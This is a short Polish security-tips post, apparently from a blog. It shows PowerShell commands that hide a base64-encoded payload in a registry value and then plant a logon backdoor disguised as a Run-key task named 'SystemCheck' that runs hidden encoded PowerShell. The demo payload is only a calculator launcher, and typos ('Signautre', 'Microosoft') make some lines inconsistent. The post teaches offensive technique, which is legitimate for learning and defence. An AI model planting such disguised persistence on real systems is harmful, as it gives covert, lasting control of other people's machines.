Powyższy oneliner ustawi w rejestrze Windows dla
subklucza w lokalizacji
HKCU:\SOFTWARE\Microsoft\Windows wartość
YwBhAGwAYwA= o nazwie
Signautre.
W pełnej,
zgodnej ze sztuką formie bez skracania, miałoby to postać:
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows" -Name "Signature" -Value "YwBhAGwAYwA="
Ten konkretny przypadek umieści zakodowany w base64 string
calc.exe pod nazwą
Signature, która domyślnie w tym subkluczu rejestru nie istnieje - posłuży nam to jako
payload, który zostanie uruchomiony w protipie
aptm.in/protip/0053.
Żeby na szybko wyświetlić jakie znajdują się wartości w danym
subkluczu, możemy wykorzystać polecenie:
Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows"
lub w skrócie
gp HKCU:\SOFTWARE\Microsoft\Windows
Prosty backdoor pod przykrywką zadania o nazwie
SystemCheck uruchamiający zakodowany w base64 payload Powershella po zalogowaniu:
sp HKCU:\SOFTWARE\Microosoft\Windows\CurrentVersion\Run SystemCheck "powershell -w h -enc YwBhAGwAYwA="
Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.
